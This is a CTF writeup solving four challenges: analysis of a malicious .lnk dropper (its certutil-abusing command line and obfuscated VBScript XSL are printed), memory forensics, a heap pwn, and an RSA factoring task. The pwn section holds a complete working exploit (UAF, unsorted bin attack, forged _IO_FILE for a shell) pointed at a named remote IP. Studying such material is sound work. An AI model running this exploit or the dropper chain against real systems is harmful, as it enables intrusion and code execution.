2022 HWS Hardware Security Winter Camp X DASCTF Jan: Partial Writeup

Table of Contents

MISC

badPDF

gogogo

PWN

Free Points

CRYPTO

babyrsa


MISC

badPDF

The starting point is a Windows .lnk shortcut. Opening it on Windows flashes a cmd window and then a PDF comes up. After it has run, the files on disk seem to change, and the shortcut's target reveals what is going on:

%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y
&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y
&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp > %tmp%\\cSi1r0uywDNvDu.

The for loop copies certutil.exe (the only *ertu*.exe under System32) to %tmp%\msoia.exe, and "TVNDRgAAAA" is the base64 encoding of the CAB header "MSCF" followed by four zero bytes, so findstr pulls the base64-encoded cabinet that is embedded in the .lnk itself out into a file; the renamed certutil then decodes it and expand unpacks it. Reproduce the steps in the %tmp% directory:

findstr.exe "TVNDRgAAAA" g4ZokyumBB2gDn.tmp >00hululu
.\msoia.exe -decode .\00hululu 11hahaha
expand .\11hahaha -F:* ./

This yields cSi1r0uywDNvDu.tmp, an XSL stylesheet carrying a VBScript block:

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="VBScript">
 <![CDATA[
 rBOH7OLTCVxzkH = HrtvBsRh3gNUbe("676d60667a64333665326564333665326564333665326536653265643336656564333665327c"):
 execute(rBOH7OLTCVxzkH):
	function HrtvBsRh3gNUbe(bhhz6HalbOkrki):
		for rBOH7OLTCVxzkH= 1 to len(bhhz6HalbOkrki) step 2:
			HrtvBsRh3gNUbe = HrtvBsRh3gNUbe & chr(asc(chr("&h" & mid(bhhz6HalbOkrki,rBOH7OLTCVxzkH,2)))xor 1):
			next:
	end function:
 ]]> </ms:script>
</stylesheet>

After deobfuscation the logic is simply: read the hex string two digits at a time, turn each pair into a byte, XOR it with 1, and append the character (the script then hands the result to execute()):

hexStr = "676d60667a64333665326564333665326564333665326536653265643336656564333665327c"
for i = 1 to len(hexStr) step 2
    flag = flag & chr(asc(chr("&h" & mid(hexStr, i, 2))) xor 1)
next

Decoding that directly gives the flag.
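The same decoding in Python, as an added example (my own script, not the writeup's and not the malware's): it re-implements the VBScript's two-hex-digits-then-XOR-1 routine on the blob from the .xsl, shows why the findstr key "TVNDRgAAAA" matches (it is base64 of the CAB header "MSCF" plus four zero bytes), and emulates the findstr-then-certutil stage on a constructed stand-in for the .lnk. The function names and the sample bytes are mine.

```python
import base64

# Hex blob lifted from the VBScript inside the extracted .xsl (it is on the page).
OBFUSCATED_HEX = "676d60667a64333665326564333665326564333665326536653265643336656564333665327c"

# findstr's search key from the .lnk command line.
CAB_MARKER_B64 = "TVNDRgAAAA"


def vbs_deobfuscate(hexstr: str, key: int = 1) -> str:
    """Re-implements HrtvBsRh3gNUbe(): two hex digits -> one byte, XOR key (1), to a char."""
    if len(hexstr) % 2:
        raise ValueError("odd-length hex string")
    out = []
    for i in range(0, len(hexstr), 2):
        out.append(chr(int(hexstr[i:i + 2], 16) ^ key))
    return "".join(out)


def cab_marker_is_mscf() -> bool:
    """Why "TVNDRgAAAA" finds the payload: it is base64("MSCF" + 4 zero bytes), the CAB header."""
    return base64.b64encode(b"MSCF" + b"\x00" * 4).decode().startswith(CAB_MARKER_B64)


def carve_embedded_cab(lnk_bytes: bytes) -> bytes:
    """Emulate `findstr "TVNDRgAAAA" <lnk> > x` followed by `certutil -decode x out`:
    keep only the line(s) carrying the marker, base64-decode them, check the magic."""
    lines = [ln for ln in lnk_bytes.splitlines() if CAB_MARKER_B64.encode() in ln]
    if not lines:
        raise ValueError("no base64 CAB marker in input")
    blob = base64.b64decode(b"".join(lines))
    if not blob.startswith(b"MSCF"):
        raise ValueError("decoded data is not a cabinet")
    return blob


# Constructed stand-in for the trojanised .lnk: some shortcut-looking bytes, then the
# base64 cabinet on its own line (this is NOT the real sample).
SAMPLE_LNK = (
    b"L\x00\x00\x00\x01\x14\x02\x00junk-shortcut-bytes\r\n"
    + base64.b64encode(b"MSCF" + b"\x00" * 4 + b"<fake cab body>") + b"\r\n"
    + b"trailing junk\r\n"
)


if __name__ == "__main__":
    print(vbs_deobfuscate(OBFUSCATED_HEX))
    print("marker is MSCF header:", cab_marker_is_mscf())
    print("carved cab bytes:", len(carve_embedded_cab(SAMPLE_LNK)))
```

The XOR key of 1 is all the "encryption" there is; the extra indirection through chr("&h..") in the VBScript only converts the hex pair to a number.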

gogogo

The challenge hands out a raw memory image plus a set of jigsaw pieces. Piecing them together by hand is easy enough (the complete picture shown here was actually produced later by a script).

That gives a password; a somd5 lookup shows it is the MD5 of 123456easyx, which ends up being irrelevant.

3e8f092d4d7b80ce338d6e238efb01

Next, forensics on the memory image:

python vol.py -f 2.raw filescan | grep -E '\.zip|\.rar|\.jpg|\.png|\.txt|\.bmp|\.7z'

This turns up csgo.zip; dump it straight out (dumpfiles). It is a password-protected archive, and the password found above opens it. Running binwalk on the extracted file yields a JPEG.

It is an Aztec code with the centre missing; restore the missing part in Photoshop.

Scanning it with the 中国编码 barcode app gives the flag: flag{fbab8380-a642-48aa-89b1-8e251f826b12}
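filescan and dumpfiles locate csgo.zip through the kernel's file objects. As an added example (my own code, not part of the writeup), the script below does the lower-level version a practitioner reaches for when the profile or pool scan fails: it signature-carves ZIP local file headers straight out of a raw image and reads the general-purpose flag bit that marks an entry as password-protected, which is the reason the password recovered from the puzzle was needed. The sample image is constructed inline; the names and sizes in it are made up.

```python
import io
import struct
import zipfile

ZIP_LOCAL_MAGIC = b"PK\x03\x04"
# local file header: sig, version, flags, method, mtime, mdate, crc32, csize, usize, name_len, extra_len
LOCAL_HDR_FMT = "<IHHHHHIIIHH"
LOCAL_HDR_LEN = struct.calcsize(LOCAL_HDR_FMT)   # 30 bytes
FLAG_ENCRYPTED = 0x0001                          # general-purpose bit 0: entry is password-protected


def carve_zip_entries(image: bytes):
    """Signature-scan a raw image for ZIP local file headers and describe each one."""
    found = []
    pos = image.find(ZIP_LOCAL_MAGIC)
    while pos != -1:
        hdr = image[pos:pos + LOCAL_HDR_LEN]
        if len(hdr) < LOCAL_HDR_LEN:
            break
        _, _, flags, method, _, _, crc, csize, usize, nlen, _ = struct.unpack(LOCAL_HDR_FMT, hdr)
        name = image[pos + LOCAL_HDR_LEN:pos + LOCAL_HDR_LEN + nlen]
        # a stray "PK\x03\x04" in random memory rarely comes with a sane printable name
        if nlen and len(name) == nlen and all(0x20 <= b < 0x7f for b in name):
            found.append({"offset": pos, "name": name.decode("ascii"),
                          "encrypted": bool(flags & FLAG_ENCRYPTED),
                          "method": method, "crc32": crc, "csize": csize, "usize": usize})
        pos = image.find(ZIP_LOCAL_MAGIC, pos + len(ZIP_LOCAL_MAGIC))
    return found


def encrypted_entry_names(image: bytes):
    """Only the entries that will ask for a password when extracted."""
    return [e["name"] for e in carve_zip_entries(image) if e["encrypted"]]


def _plain_zip() -> bytes:
    # zipfile can only write unencrypted archives
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


def _encrypted_local_header(name: bytes, size: int) -> bytes:
    # hand-built local header with the encrypted bit set (method 8 = deflate), body is a stub
    hdr = struct.pack(LOCAL_HDR_FMT, 0x04034b50, 20, FLAG_ENCRYPTED, 8, 0, 0, 0, size, size, len(name), 0)
    return hdr + name + b"\x00" * size


# Constructed "memory image": junk, an unencrypted archive, junk, a lone encrypted entry, junk.
SAMPLE_IMAGE = (b"\x00" * 64 + b"PK is not always a zip" + _plain_zip() + b"\xff" * 32
                + _encrypted_local_header(b"csgo.jpg", 16) + b"\x00" * 32)


if __name__ == "__main__":
    for entry in carve_zip_entries(SAMPLE_IMAGE):
        print(entry)
    print("needs a password:", encrypted_entry_names(SAMPLE_IMAGE))
```

On a real dump run it over the whole file (or mmap it); the offsets it prints are what you feed to dd or a hex editor when dumpfiles cannot rebuild the file from page-cache fragments.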

 

PWN

Free Points

A genuine free-points challenge, re-used from an earlier CTF; the original is written up at http://www.suphp.cn/anquanke/12/258512.html#

The program has a UAF. Use it for an unsorted bin attack: set the freed chunk's bk to global_max_fast - 0x10, so the next allocation served from the unsorted bin writes the unsorted bin's own address (main_arena + 96) into global_max_fast. Every chunk the program frees at the end is then small enough to count as a fastbin chunk, and the head of each fastbin list is a pointer stored inside libc (main_arena.fastbinsY, indexed by chunk size), so freeing a chunk writes the chunk's address into a libc location chosen by its size.

Pick the size so that this slot is _IO_list_all: freeing the chunk makes _IO_list_all point at it. The chunk holds a forged _IO_FILE whose vtable is _IO_str_jumps - 8, so the _IO_OVERFLOW call that _IO_flush_all_lockp makes at exit lands on _IO_str_finish, which calls _s._free_buffer(_IO_buf_base); with system and "/bin/sh" in those two fields, that is a shell.

Run the old exploit as-is:

from pwn import *

# from LibcSearcher import *
context.log_level = 'debug'
debug = 0                      # 1: run ./pwn locally, 0: attack the remote instance
file_name = './pwn'
libc_name = './libc-2.27.so'   # the libc shipped with the challenge
ip = '1.13.162.249'
port = '10001'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip, int(port))
    libc = ELF(libc_name)


def attach_gdb():
    # renamed from debug() so it no longer shadows the `debug` switch above
    gdb.attach(r)
    input()


def pack_file(_flags=0,
              _IO_read_ptr=0,
              _IO_read_end=0,
              _IO_read_base=0,
              _IO_write_base=0,
              _IO_write_ptr=0,
              _IO_write_end=0,
              _IO_buf_base=0,
              _IO_buf_end=0,
              _IO_save_base=0,
              _IO_backup_base=0,
              _IO_save_end=0,
              _IO_marker=0,
              _IO_chain=0,
              _fileno=0,
              _lock=0,
              _wide_data=0,
              _mode=0):
    """Forge a struct _IO_FILE (x86-64 glibc 2.27, 0xd8 bytes; the vtable pointer follows it)."""
    file_struct = p32(_flags) + \
                  p32(0) + \
                  p64(_IO_read_ptr) + \
                  p64(_IO_read_end) + \
                  p64(_IO_read_base) + \
                  p64(_IO_write_base) + \
                  p64(_IO_write_ptr) + \
                  p64(_IO_write_end) + \
                  p64(_IO_buf_base) + \
                  p64(_IO_buf_end) + \
                  p64(_IO_save_base) + \
                  p64(_IO_backup_base) + \
                  p64(_IO_save_end) + \
                  p64(_IO_marker) + \
                  p64(_IO_chain) + \
                  p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")   # _lock sits at 0x88
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")   # _wide_data at 0xa0
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')   # _mode at 0xc0
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")   # sizeof(struct _IO_FILE)
    return file_struct


file = ELF(file_name)
sl = lambda x: r.sendline(x)
sd = lambda x: r.send(x)
sla = lambda x, y: r.sendlineafter(x, y)
rud = lambda x: r.recvuntil(x, drop=True)
ru = lambda x: r.recvuntil(x)
li = lambda name, x: log.info(name + ':' + hex(x))
ri = lambda: r.interactive()

# Two allocations with the sizes the original exploit used; the "big box" is the
# chunk that will later be refilled with the forged FILE.
ru('Now you can get a big box, what size?')
sl(str(0x1430))
ru('Now you can get a bigger box, what size?')
sl(str(0x5000))
# Leak through the UAF: the value echoed back is the freed chunk's fd, i.e. the
# unsorted bin head (main_arena + 0x60).
ru('Do you want to rename?(y/n)')
sl('y')
ru('Now your name is:')
main_arena = u64(r.recv(6) + b'\x00\x00')   # really main_arena + 0x60
li("main_arena", main_arena)
libc_base = main_arena - 0x3ebca0            # libc-2.27: main_arena at 0x3ebc40
system = libc_base + libc.symbols['system']
global_max_fast = libc_base + 0x3ed940       # hard-coded offset for this libc
IO_list_all = libc_base + libc.symbols['_IO_list_all']
IO_str_jumps = 0x3e8360 + libc_base          # hard-coded offset for this libc
# Unsorted bin attack: fd stays the unsorted bin head, bk = global_max_fast - 0x10, so the
# next allocation from the unsorted bin writes bk->fd = main_arena + 0x60 into global_max_fast.
payload = p64(main_arena) + p64(global_max_fast - 0x10)
binsh = 0x00000000001b40fa + libc_base       # hard-coded offset of "/bin/sh" in this libc
sl(payload)                                  # the "name" overwrites the freed chunk's fd/bk
# attach_gdb()
ru("Do you want to edit big box or bigger box?(1:big/2:bigger)\n")
sl("1")
ru(':\n')
# Forged FILE: _mode <= 0 and _IO_write_ptr > _IO_write_base make _IO_flush_all_lockp call
# _IO_OVERFLOW on it at exit; vtable = _IO_str_jumps - 8 turns that call into _IO_str_finish,
# which calls _s._free_buffer(_IO_buf_base), i.e. system("/bin/sh").
fake_file = pack_file(_IO_read_base=IO_list_all - 0x10,
                      _IO_write_base=0,
                      _IO_write_ptr=1,
                      _IO_buf_base=binsh,
                      _mode=0, )
fake_file += p64(IO_str_jumps - 8) + p64(0) + p64(system)   # vtable, _allocate_buffer, _free_buffer
# The chunk header already occupies the first 0x10 bytes of the FILE, so those are skipped.
sl(fake_file[0x10:])
ri()
flag{5hen_m3_5hi_kuai_1e_xin9_Qiu}
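The exploit above wires four FILE fields and two trailing pointers to a precise chain of glibc 2.27 checks. As an added example (my own checker, not part of the original writeup), this script rebuilds the same forged FILE by offset and verifies each link of that chain offline: the condition under which _IO_flush_all_lockp calls _IO_OVERFLOW, the vtable-8 trick that makes the __overflow slot coincide with the __finish entry of _IO_str_jumps, and the _IO_str_finish free call. The offsets are those of struct _IO_FILE, _IO_FILE_plus and _IO_strfile on x86-64 glibc 2.27 (assumed to be the challenge libc); the addresses used at the bottom are placeholders, not leaks.

```python
import struct

# Field offsets in struct _IO_FILE / _IO_FILE_plus / _IO_strfile, x86-64 glibc 2.27
# (from the struct definitions; assumption: same libc as the challenge).
IO_FLAGS      = 0x00
IO_READ_BASE  = 0x18
IO_WRITE_BASE = 0x20
IO_WRITE_PTR  = 0x28
IO_BUF_BASE   = 0x38
IO_MODE       = 0xc0
IO_VTABLE     = 0xd8    # _IO_FILE_plus.vtable, right after the 0xd8-byte _IO_FILE
IO_ALLOC_BUF  = 0xe0    # _IO_strfile._s._allocate_buffer
IO_FREE_BUF   = 0xe8    # _IO_strfile._s._free_buffer
IO_USER_BUF   = 0x0001  # _flags bit that makes _IO_str_finish skip the free
JUMP_FINISH   = 0x10    # __finish slot inside an _IO_jump_t
JUMP_OVERFLOW = 0x18    # __overflow slot inside an _IO_jump_t


def build_fake_file(io_list_all, binsh, system, io_str_jumps, flags=0):
    """The same field choices as the exploit's pack_file() call, written by offset."""
    f = bytearray(0xf0)
    struct.pack_into("<I", f, IO_FLAGS, flags)
    for off, val in ((IO_READ_BASE, io_list_all - 0x10), (IO_WRITE_BASE, 0),
                     (IO_WRITE_PTR, 1), (IO_BUF_BASE, binsh),
                     (IO_VTABLE, io_str_jumps - 8), (IO_ALLOC_BUF, 0), (IO_FREE_BUF, system)):
        struct.pack_into("<Q", f, off, val)
    return bytes(f)


def _u64(f, off):
    return struct.unpack_from("<Q", f, off)[0]


def flush_all_calls_overflow(f):
    """_IO_flush_all_lockp calls _IO_OVERFLOW(fp, EOF) only if _mode <= 0 and write_ptr > write_base."""
    mode = struct.unpack_from("<i", f, IO_MODE)[0]
    return mode <= 0 and _u64(f, IO_WRITE_PTR) > _u64(f, IO_WRITE_BASE)


def overflow_slot_address(f):
    """Where _IO_OVERFLOW fetches its function pointer from: vtable + 0x18."""
    return _u64(f, IO_VTABLE) + JUMP_OVERFLOW


def str_finish_free_call(f):
    """What _IO_str_finish does with this FILE: (_s._free_buffer, _IO_buf_base), or None if it skips the free."""
    flags = struct.unpack_from("<I", f, IO_FLAGS)[0]
    buf_base = _u64(f, IO_BUF_BASE)
    if buf_base == 0 or flags & IO_USER_BUF:
        return None
    return _u64(f, IO_FREE_BUF), buf_base


def preflight(f, io_str_jumps, system, binsh):
    """True when exit -> _IO_OVERFLOW -> _IO_str_finish -> system("/bin/sh") holds for this FILE."""
    return (flush_all_calls_overflow(f)
            and overflow_slot_address(f) == io_str_jumps + JUMP_FINISH   # the vtable-8 trick
            and str_finish_free_call(f) == (system, binsh))


if __name__ == "__main__":
    # Placeholder addresses; substitute the exploit's libc_base-relative values.
    LIBC = 0x7f1234000000
    IO_LIST_ALL, BINSH, SYSTEM, STR_JUMPS = LIBC + 0x1000, LIBC + 0x2000, LIBC + 0x3000, LIBC + 0x4000
    fake = build_fake_file(IO_LIST_ALL, BINSH, SYSTEM, STR_JUMPS)
    print("chain holds:", preflight(fake, STR_JUMPS, SYSTEM, BINSH))
```

Two caveats the checker makes explicit. In the exploit the first 0x10 bytes of the FILE are the chunk header, so _flags is whatever happens to sit in prev_size; if bit 0 (_IO_USER_BUF) were set there, _IO_str_finish would skip the free and the chain would die silently, which is what the flags argument lets you try. And the one thing it cannot check is that the vtable passes IO_validate_vtable: that holds only because _IO_str_jumps - 8 still lies inside libc's __libc_IO_vtables section.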

CRYPTO

babyrsa

Challenge source:

import os
from secret import FLAG,p,q,e
from Crypto.Util.number import bytes_to_long,long_to_bytes


N = p*q

def encrypt(m,N,e):
    return pow(m,e,N)

def decrypt(c,N,d):
    return pow(c,d,N)

def padding(msg):
    res = msg
    if len(res) < 128:
        res = res + os.urandom(128-len(res))
    return res

def transfer(msg):
    assert len(msg) < 128
    m = padding(msg)
    return bytes_to_long(m)

if __name__ == "__main__":
    m = transfer(FLAG)
    print(N,e)
    print(encrypt(m,N,e))


#13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
#1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524

No need to overthink it: N factors directly on factordb.com.

n = 13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929
p = 98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q = 133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
e = 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
c = 1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524

import gmpy2
from Crypto.Util.number import long_to_bytes

assert p * q == n                 # sanity-check the factordb factors
phi = (p - 1) * (q - 1)
d = int(gmpy2.invert(e, phi))
m = pow(c, d, n)
print(long_to_bytes(m))           # flag, followed by the random padding bytes
# b'hwctf{01d_Curs3_c4Me_Again}vG\x03MC\xcd\xfd\x1d\x0bO\xcaV\x9b\x87vk\xd6\xb3\xbb\x8f\xc5\xd61\xdf7\x0f\x90\xc6\x17oj]\xf5J\xd4\xa9\xcc\xdb\xbe?\xb2(\xf0\xb2\xb6\x99b\xa7e\xa8\x82\xf7SY\xc7\xd9\xde\xc4\xb5\xe3q\xc1\xe8\xfeM\xbd\xbe\xfdD\xed\xb3\x12~\x9d\xba\xa4\xb0\xfek\x81\xc4-\x82\xb3%\xae4\x7fGl\x9a\xac\xc3\x91\xc1\xbc\x04\x03o\xa4\x8d'
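The script above works because the factors are known; the unusually large e (the same size as N) changes nothing, since d = e^-1 mod phi(N) is computed the same way. As an added example (my own code, not the writeup's), here is the same recovery as a function with the checks worth running before trusting d, plus padding-aware flag extraction, since the plaintext is the flag followed by random bytes. It is exercised on constructed toy parameters (two Mersenne primes and an 18-byte block) so it runs offline; the challenge values drop in with block=128.

```python
import os
import re
from math import gcd

# Flag shape: label, "{", anything but braces, "}". The padding is random bytes, so match on bytes.
FLAG_RE = re.compile(rb"[A-Za-z0-9_]+\{[^{}]*\}")


def pad(msg: bytes, block: int) -> bytes:
    """The challenge's padding(): append random bytes up to `block` bytes (128 in the original)."""
    if len(msg) >= block:
        raise ValueError("message must be shorter than the block")
    return msg + os.urandom(block - len(msg))


def encrypt(msg: bytes, n: int, e: int, block: int) -> int:
    return pow(int.from_bytes(pad(msg, block), "big"), e, n)


def recover_flag(n: int, p: int, q: int, e: int, c: int, block: int) -> bytes:
    """Textbook RSA decryption from known factors, with the checks worth doing before trusting d."""
    if p * q != n:
        raise ValueError("p*q != n: these are not the factors of this modulus")
    phi = (p - 1) * (q - 1)
    if gcd(e, phi) != 1:
        raise ValueError("e has no inverse mod phi(n)")
    d = pow(e, -1, phi)                          # Python 3.8+; same value as gmpy2.invert(e, phi)
    m = pow(c, d, n).to_bytes(block, "big")      # plaintext is exactly `block` bytes: flag + padding
    hit = FLAG_RE.search(m)
    if hit is None:
        raise ValueError("decrypted block holds no flag-shaped text")
    return hit.group(0)


# Constructed toy parameters (NOT the challenge's): two Mersenne primes, so n is about 2^150
# and an 18-byte padded block still fits below n. Swap in the page's n, p, q, e, c and block=128.
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
BLOCK = 18


if __name__ == "__main__":
    c = encrypt(b"hwctf{t3st}", N, E, BLOCK)
    print(recover_flag(N, P, Q, E, c, BLOCK))
```

The regex stops at the first closing brace, so the random tail never leaks into the result even when it happens to contain printable characters.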
Author: 塞纳河畔的春水